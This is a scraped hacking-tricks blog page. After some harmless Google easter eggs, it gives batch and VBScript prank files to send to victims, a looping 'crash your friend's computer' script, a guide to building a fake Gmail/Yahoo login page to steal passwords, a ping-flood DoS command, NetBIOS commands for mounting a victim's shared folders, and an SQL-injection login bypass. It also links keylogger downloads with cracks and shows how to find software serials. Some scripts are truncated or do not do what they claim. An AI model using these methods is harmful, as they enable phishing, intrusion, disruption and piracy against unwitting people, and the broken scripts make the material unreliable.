Latest Posts

Top 7 Funny Google Tricks

We all use google for searching but its time to explore the funny side of google.Here I have collected the top 7 funny google tricks that will amaze you.Some of the tricks are provided by google itself while other have been developers.
So, Here is the List Of  Google’s Top 7 tricks
  1. 1. Google gravity:- We all have read the Newton’s law of gravity.Does it also apply to google?To test it follow the instructions
  • Go to google.com                                                     
  • Type Google Gravity                                                                 
  • Click on I’m feeling Lucky
Now you will see the effect of gravity on google.The google icon will fall down automatically.You can even pickup and throw google icon anyware.
    googlegravitytrick Top 7 Funny Google Tricks
  1. 2. Google Pacman Game:-I have already published a post on the google pacman.To read how to play the pacman game on google click the link below
  1. 3. Change Background Image:-You can also change the background image of google image.To change the background image follow the instructions
  • Go to google.com
  • Click on the Change Background Image
  • googlelk Top 7 Funny Google Tricks
  • Login with gmail username and upload Image
This will not work if you open the encrypted google.To open unencrypted version  click Here
  1. 4. Epic Google:- In epic google you will see the font size of google increasing automatically as if it will come out of your computer screen.To use google Follow the instructions
  • Go to google.com
  • Type Epic Google
  • Click on I’m feeling Lucky
  1. 5. Google Advanced Search Hacks:-Google provides some special search operators.By using these operators you can easily search anything you want.To learn about these oprators and how to use them click the link below.
  1. 6. Google Hacker:-want to see how the google homepage will look if it gets hacked .Follow the instructions below
  • Go to google.com
  • Type Google Hacker
  • Click on I’m feeling Lucky
  1. 7. Annoying Google:- In this trick the capitalisation of your searches will change automatically.Some words will change into small letter and some into capital letters in your search result.Want to try it follow the instructions
  • Go to google.com
  • Type Annoying Google
  • Click on I’m feeling Lucky
If you also know some more cool google tricks then do share with us and our readers by commenting your google tricks
Leave a Comment Read More

DANGEROUS VBScript PRANKS

1) Convey a little message and shut down the computer:
Type :


@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s



Save it as "Anything.BAT" in All Files and send it.

2) Toggle the Caps Lock button simultaneously:
Type :


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Continually pop out the CD Drive. If there are more than one, it pops out all of them!
Type :


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4) Frustrate someone by making this VBScript hit Enter simultaneously:
Type :


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" after some time of clicking the file and freak someone out:

Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate someone by making this VBScript hit Backspace simultaneously:
Type :


MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack the keyboard and make it type "You are a fool" continuously:
Type :


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :


@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.
Leave a Comment Read More

Hacks Unprotected Admin or Administrator account.

There are four ways to hack the admin password:
1. Simply accessing Unprotected Administrator Account.
2. Hacking Through Net User Command.
3. Hacking Using the ERD(Emergency Rescue Disk) Commander.
4. Resetting admin password using U

Lets start from the first technique to hack the admin or administrator password..

1. Simply Accessing the Unprotected Admin or Administrator account.

How this hack works ? When we install windows XP on our system we usually rename the username as our name or some other keyword. But windows always creates the administrator account whenever we set up windows XP. So when you create your user account during install , windows creates two accounts that is one is your username account and other is Administrator account. But the main thing is that you will only see the account with your username and the Administrator account is hidden but its there and you can easily access that using the following steps:
Step1: Start your computer.
Step2: Now let it start until the windows user's username appears as shown in
snapshot below...

Step3: As This Window Appears Press Ctrl+Alt +Delete (2 times).. Now the Windows like shown below appears.
Step4: Now as shown above Enter the Administrator on the Username box and press enter... Now you will be login in the admin account can easily rest the password...

For Resetting password you can follow two Procedures..
Procedure 1: Goto Start --> Control Panel --> User Accounts.. Now select the account whose password u want to reset.
Procedure 2 : Follow the Next method i.e hacking password through Net User Command.

Note: Hack 1 will only work if Administrator(default) is unsecured i.e User as some other username like above shown figure...


Leave a Comment Read More

How to crash friends computer


How to crash a friend’s computer using simple notepad .bat files By following two rules you can crash anyone’s pc Rule 1:- Those who download this document want to tell
them that I am not responsible for any action
they do and they are responsible for it....
Rule 2:- Copy the given code in notepad and then save it as whatever
you want to name but in the end put .bat so that it can become
a batch file and make the save as option all files run it and see
the effect .if you like the document thencomment so I can put
more of the same kind of document. ......
Delete c drive @ECHO OFF
:RunIt
ECHO Deleting "C:\WINDOWS"
Pause
cls
shutdown -s -t 15 -c "C:\WINDOWS\PROGRAMFILES DELETED. REBOOTING..."
:start
start
goto start

Leave a Comment Read More

CREATE FAKE LOGIN PAGE TO STEAL PASSWORDS

{1} Open www.jotform.com and Sign Up.

{2} Then Login there with your newly registered account.

{3} Now click on ' Create your first form'.

{4} Now delete all the pre-defined entries, just leave 'First Name:'. (To delete entries, select the particular entry and then click on the cross sign.)

{5} Now Click on 'First Name:' (Exactly on First Name). Now the option to Edit the First Name is activated, type there "username:" (for gmail) or YahooId: (for Yahoo)

{6} Now Click on 'Power Tool' Option (In right hand side...)

{7} Double click on 'PasswordBox'. Now Click the newly form password entry to edit it. Rename it as 'Password:'

{8} Now Click on 'Properties' Option (In right hand side...). These are the form properties.

{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.

{10} Now in ThankYou URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don't leave it blank...)

{11} Now Click on 'Save'. After saving, click on 'Source' Option.

{12} Now you can see two Options, namely 'Option1' & 'Option2'. Copy the full code of 'Option2'.

{13} Now open Notepad text editor and write the following code their.




Paste the Option2 code here



{14} And now save this as index.html. Now we have to put this index.html on internet. I mean now we are going to host this file. For this we will use FREE hosting provider service. You can try the following FREE hosting providers. Make a free hosting account and come back here...


http://www.webng.com
http://www.atspace.com

{15} I hope u have succesfully created a free hosting account. Now Login in your hosting account. And then Open 'File Manager'.

{16} Upload this index.html there... now u can see your index.html online by typing the url (url will be given to you by your free hosting provider..)
FINISHED

Leave a Comment Read More

Ethical Hacker Tools (Tutorials and Toolz) - added mirrors

This Blog Linked From Here Top Tabs
This Blog
Linked From Here
.Top Tabs
.
Loading...
Showing newest posts with label Hacking Tools. Show older posts Showing newest posts with label Hacking Tools. Show older postsAdvanced Office Password Breaker Pro 2.0
| Hacking Tools, Software | 2 comments »
Description:
Forgetting a password to your own Word document or Excel worksheet is surely annoying,
but interfering with the office workflow causes substantial damage. If youÆre not in
hurry, you can try guessing the password. If you have no time to play games, just unlock
your documents and spreadsheets û guaranteed! No matter how long and complex your
passwords are, Advanced Office Password breaker recovers Word documents and Excel
spreadsheets within a limited timeframe. No need to perform lengthy attacks while a
40-bit encryption key can be crunched quickly and efficiently, and more importantly,
with a guaranteed positive result.

Advanced Office Password Breaker unlocks documents created with Microsoft Office Word
and Excel 97 and 2000, as well as documents saved with Microsoft Office XP and 2003
in Office 97/2000 Compatibility Mode.

Download Now

Password for rar file : appz-http://wareznet.net/

Size:
0.812 MB

Source


Keylogger
| Hacking tips, Hacking Tools | 3 comments »
Keystroke logging (often called keylogging) is a diagnostic tool used in software development that captures the user's keystrokes. It can be useful to determine sources of error in computer systems and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for law enforcement and espionage—for instance, providing a means to obtain passwords or encryption keys and thus bypassing other security measures. However, keyloggers are widely available on the Internet and can be used by private parties to spy on the computer usage of others.

Writing software applications for keylogging is trivial, and like any computer program can be distributed as a trojan horse or as part of a virus. What is not trivial however, is installing a keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.

lets see some of the key logger's what I known

Local Keylogger Pro 3.1 - Local Keylogger Pro allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Local Keylogger Pro makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. Local Keylogger Pro can record all user activity to the log file. This information can be exported to HTML for convenient viewing in your web browser, or exported to MHT file for analysis. This allows you to see how long users worked with particular programs, how much time they spent on Internet, what sites they visited, what they typed in e-mails or chats.[Download][Crack]

XP Advanced Keylogger 2.5 - XP Advanced Keylogger is a top-rated invisible easy-to-use surveillance tool that records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. It can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.{Windows 95, NT4, 98, Me, 2000, XP} [Download][Crack]

Blazing Tools Perfect Keylogger 1.67 - Perfect Keylogger is a new generation keylogger which is absolutely undetectable. It was created as an alternative to very expensive commercial products like iSpyNow, Spector Keylogger or E-Blaster. It has the same functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and immediately use it without changing of its settings.

Perfect Keylogger is an extremely compact, award-winning tool. It is translated into 20 languages and is increasingly popular around the world! It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list.

Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.
Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in the Windows NT/2000/XP/Vista Task Manager![Download][Crack]

SC Keylogger Pro V3.2 - A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.[Download]

Hook Keylogger v2.1 - Small and stealth keylogger without an installer; simplest keylogger possible Specify log file location Uses a WH_JOURNALRECORD hooking procedure to capture everything typed Hide and unhide the interface by pressing Ctrl+Shift+F7 [Download][Crack]

Advanced Invisible Keylogger 1.8 - Advanced Invisible Keylogger is an stealth spy tool, the best spy software offered by ToolAnywhere! Advanced Invisible Keylogger runs silently at the lowest level of Windows capturing every keystroke including usernames and windows log-on passwords.

Advanced Invisible Keylogger can also capture active window text, text typed in all popular instant messengers including AOL, YAHOO, ICQ, MSN and AIM.

All Desktop activity will be recorded through Advanced Invisible Keylogger’s secret! Have reports sent to your email address at anytime secretly! Advanced Invisible Keylogger is so stealthy and hides so well that not even a computer technician with years of experience can detect it running!

The most powerful stealth program at a most affordable price! An easy-to-use stealth solution for PC and Internet surveillance. Purchase your copy today and feel safe and secure.[Download]

This is my previous post on Key logger
visit this to


Rapidshare Downloader
| Hacking tips, Hacking Tools, Internet Related, Rapidshare / Megaupload, Software | 6 comments »
CMS Grabber is the best tool I ever found on internet, this tool made me stun when I started using this, many rapid share users are still searching for free premium account, this tool make it useless. Using this tool we can download files from rapid share without any download limitations, multiple files at once, this is more than rapid share premium account. Lets see it in brief


THE ONLY LEGAL PROGRAM FOR DOWNLOADS FROM RAPIDSHARE !!!

Bypasses download limitations. Download multiple files at once. Download even more than with premium !

This release is sponsored by StackFile Corp.

What's new
- fixed rapidshare.com grabber
- fixed rapidshare.com link checker
- added huawei tool for renewing IP address for ADSL users(Supported hardware: SmartAX MT882 ADSL Router/Modem) - currently we support only USB mode, next version will alow to specify router address (it is now set to 192.168.1.2 -- you can configure your router to that address anyway so it will work in "Network Mode" -- i.e. when connected to the LAN NIC))

This release is sponsored by StackFile Corp and coded by SpongeBob.

NOTE: This program is not Vista compatible, but works fine with disabled UAC (User Account Control - very useful and inovative thing which renders your computer useless and annoying to use it).

Download from here

Homepage: CMSzone
The Home of grabber


Access Diver
| Hacking Tools | 3 comments »
AccessDiver is a security tester for WEB sites. It incorporates a set of powerful features which help you find and organize failures and weaknesses from your web site. Here is a quick list of the features available


>Contains fast security that uses up to 100 bots to do its analysis.
>Detects directory failures by comparing hundreds of known problems to your site.
>AccessDiver is fully proxy compliant and has a proxy analyzer (speed / anonymity) and a proxy hunter built-in.
>A built-in word leecher helps you increase the size of your dictionaries to expand and reinforce your analysis.
>A powerful task automizer manages your jobs transparently. You can tackle unlrelated tasks while Accessdiver is working, saving you time.
>An on-the-fly word manipulator lets you increase the strength of your dictionaries easily when doing your analyzis.
>A PING tester is included to tell you the efficiency of your site and the efficiency of an Internet address you would like to access.
>A DNS resolver lets you look up the host name of an IP address and reverse the process to learn an unknown host name.
>A feature called 'HTTP debugger' helps your understanding of how actual HTTP protocol works. It opens up the process so you see what really happens during a connection problem.
>A WHOIS gadget lets you retrieve owner information of a domain name (in case you would like to buy the domain or contact the actual owner).
>An update notifier automatically tells you when a new version of AccessDiver is available.
>And I welcome you to discover the other extremely features by yourself... :)
>A leeching system allows you to collect new proxies to make better proxy lists
>n A proxy Hunting system allows you to get even more proxies by scanning IP regions...
>A file splitting and file merging system allows you to mixup files, or cut them in mutiple parts. That's good to handle wordlists or proxylists.


Requirements

A PC compatible machine
Windows 9x,Me,2000,XP,2003
7 MB of space on your disk
192 MB of memory (RAM)
Pentium 200 or higher
Screen resolution : 800x600

[Download from here]

For more hacking tools visit : http://wehackershackingtools.blogspot.com/


Hacking Help Doc
| Hacking tips, Hacking Tools | 0 comments »

HELP ABOUT WEBSITE HACKING
Different Methods Of Hacking With Bios
How To Get Ip Address Of Victom Pc
Tips About Hacking
Help About Hacking With Trojans
.PDF Files Contain Hacking Help
How To Find Any Serial Number Of Software Or Games ect..
Telnet Dos Base Hacking Old Methods But Interesting



Ethical Hacker Tools (Tutorials and Toolz) - added mirrors
| Hacking Tools | 1 comments »
Students then learn how intruders escalate privileges and what steps can be taken to secure a system. Students also learn about intrusion detection, policy creation, social engineering, DDoS attacks, buffer overflows, and virus creation. When students leave this intensive five-day class, they will have hands-on understanding and experience in ethical hacking.

Chapter 1 - Introduction to Ethical Hacking
Chapter 2 - Footprinting
Chapter 3 - Scanning
Chapter 4 - Enumeration
Chapter 5 - System Hacking
Chapter 6 - Trojans and Backdoors
Chapter 7 - Sniffers
Chapter 8 - Denial of Service
Chapter 9 - Social Engineering
Chapter 10 - Session Hijacking
Chapter 11 - Hacking Web Servers
Chapter 12 - Web Application Vulnerabilities
Chapter 13 - Web Based Password Cracking Techniques
Chapter 14 - SQL Injection
Chapter 15 - Hacking Wireless Networks
Chapter 16 - Evading IDS, Firewalls and Honey Pots
Chapter 17 - Linux Hacking
Chapter 18 - Buffer Overflows
Chapter 19 - Cryptography
Chapter 20 - Virus and Worms
Chapter 21 - Physical Security
Chapter 22 - Penetration Testing

Code:
http://www.megaupload.com/?d=VOUDZCCD
http://www.megaupload.com/?d=S43BLLWQ
http://www.megaupload.com/?d=7BW82RQ3
http://www.megaupload.com/?d=FJTZNC39
http://www.megaupload.com/?d=HQJ26BGM
http://www.megaupload.com/?d=DN9JE0AL
Leave a Comment Read More

Lock any folder using DOS

 
Friends Hide your folders with out using any soft
just go to

run.....>

cmd....>

note 1 "_" give 1 space on that place

note 2 ex:- if your folder is at D drive then

-->first you D: and press enter after you write below command

-->Attrib "your folder name"_+r_+a_+s_+h

-->enter

-->if you want to view that folder then

you write same command use with -

like -->attrib "your folder name"_–r_–a_–s_–h

For example:

->first you D: and press enter after you write below command

-->Attrib "Wehackers"_+r_+a_+s_+h

-->enter

-->if you want to view that folder then

you write same command use with -

like -->attrib "Wehackers"_–r_–a_–s_–h

Note:
replace "_" by space
1 comment Read More

Use Google to get Serial No of any Software


Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch....

But many don't known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware....

So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss

Just follow the steps as instructed below

1) Go to http://www.google.com
2) type this syntax in search bar " 94FBR"
3) Replace Product name with desired software and leave a space then type 94FBR
4) Press enter, thats it

Now you receive Many pages which contains Serial no, Crack, Patches....

Just make a try, this simple trick works for many people
Leave a Comment Read More

LATEST AIRTEL FAKE CHEATS HACKS MOBILE OFFICE

Recently Airtel has launched its 3G services in Bangalore/Bengaluru,Coimbatore & Tamilnadu.As like previously 2G GPRS tricks,the final Airtel 3G loop hole has been leaked.

The Main loop hole of this trick is you can get 3G speed in 2G GPRS Mobile Office Inetrnet pack cost.I think now you are able to understand Airtel 3G trick:-


If you are not able to understand this hack then follow the procedure given below:-

1.Activate the 3G on your airtel number by sending an SMS as 3G to 121.After you sent the message another message arrives and it asks for conformation.

2.Now you need to confirm the subscription by just replying the message as 1.Within few hours your 3G service will be activated.

3.After the activation of your 3G service just recharge your Account with normal 2G GPRS pack.for example if you Recharge with rs95 GPRS MOBILE OFFICE pack you will get 2G data usage with 1 month validity.

4.Now go to Network Settings option and change your Network Mode from GSM to UMTS..

5.Now you have successfully activated free 3G service on your Airtel Mobile.Enjoy high Speed browsing and downloading with Airtel.If you like this post kindly subscribe to feedburner email subscriptions for more updates on your email.
Leave a Comment Read More

Change Your IP In Less Then 1 Minute

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
Leave a Comment Read More

Hacking In 15 Seconds!

Hacking In 15 Seconds!

If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt


Code:



Nbtstat -A 




[e.g: nbtstat -A 207.175.1.1]



This will give you a read out that looks like this


Code:
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________


The numbers in the <> are hex code values. What we are

interested in is the “Hex Code- number of <20>.

A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -


Code:
Net view \\


[e.g : net view \\207.175.1.1]



You will then get a response that looks something like this.

Code:

Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________

(The command was completed successfully.)




Code:
Net use x: \\\temp


[e.g : net use x: \\207.175.1.1\temp]



If all goes well for you, you will then get a response of


Code:
(The command was completed successfully.)

Open my computer you will see your victim's temp folder there
Leave a Comment Read More

Easily Speed Up Your Bsnl Broadband

Tip 1: One of the major problems with BSNL Dataone Broadband connection is the DNS servers they provide by default. Most of the time they are very slow and sometimes they fail to respond. I noticed that I am starting to spend a significant amount of time in DNS resolution with Dataone connection, often it is larger than the time it takes to actually get the reponse. Here is a simple solution to significantly speed up your DNS resolution. Open up the network connection profile and edit TCP/IP settings. In the DNS server address fields, specify the following DNS server addresses: 208.67.222.222 and 208.67.220.220
Disconnect the connection and then connect again. You are done. This specifies third party DNS servers which are significantly faster than BSNL Dataone’s DNS servers. Note: The service is provided by OpenDNS.

Tip 2: Firefox users can use FlashBlock extension to prevent downloading of Flash content by default, thereby significantly speeding up browsing experience. You can click on the placeholder icon to display the original Flash content any time. This is more of a passive tip in that reduces data usage to improve your overall experience.
Leave a Comment Read More

Hacking Websites

If you posses the HTML & JAVA knowledge then u can even access password protected websites.

To hack a Password Protected Websites just follow these steps: -

* Open the website u want to hack. Provide wrong username-password.
(e.g : Username - me and Password - ' or 1=1 --)
An error occured saying wrong username-password. Now be prepared
your work starts from here...

* Right click anywhere on that page =>> go to view source.

* There u can see the html coding with java scripts.

* Before this login information copy the url
of the site in which you are.


* Then delete the java script from the above that validates your
information in the server.(Do this very carefully, your success to
hack the site depends upon this i.e. how efficiently u delete the
JavaScript’s that validate your account information)



then look for...code ..: input name="password" type="password"
=> replace
there instead of . See there if
max length of password is less than 11 then increase it to 11
(e.g. : if then write

* Just go to file => save as and save it any where within
the hard disk with ext.html(e.g. :c:hack.htm)

* Close your webpage and go to the webpage u save in your
hard disk(e.g : c:hack.htm) Open it.

* U see that some changes in current page as compared to original
One. Don't worry.

* Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats! Your have cracked the above website and entered into the
account of Ist user saved in the server's database.

The above trick doesn't work on the websites using latest
technique to protect there servers.
Leave a Comment Read More

How To Send DoS Attack With CMD

DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

------------------------
DoS Attack Stands For Denial of Service Attack
------------------------
What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type
--------------------------------------------------
nslookup Site-Name
--------------------------------------------------
(e.g nslookup www.google.com)

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
---------------------------------------------------
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
---------------------------------------------------
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

---------------
This All System Is Known As "PING OF DEATH"
---------------

------------------------------------------------------------------
------------->> This Tutrial Is Made By _FlopAdmi_ For Educational Purposes Only!! <<------------------
------------------------------------------------------------------
Leave a Comment Read More

BlOCK OR UNBLOCK WEBSITE WITHOUT SOFTWARE !

Lots Of people want to Block some websites that are harmfull to our PC.
Like some parents take care of their children by blocking porn websites and some colleges/schools blocks some special websites that may harm there network.
You may need a costly (or even free) software to block such websites.
Why to spend money and time and why give HDD space to such useless softwares.
Just do this and block unwanted softwares from accesing.

Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.xyz.com , and that site will no longer be accessable.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<-- For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before. i.e. 127.0.0.3 www.abc.com 127.0.0.4 www.anysite.com 127.0.0.5 www.blahblah.com etc * To unblock sites just do the vice versa !
Leave a Comment Read More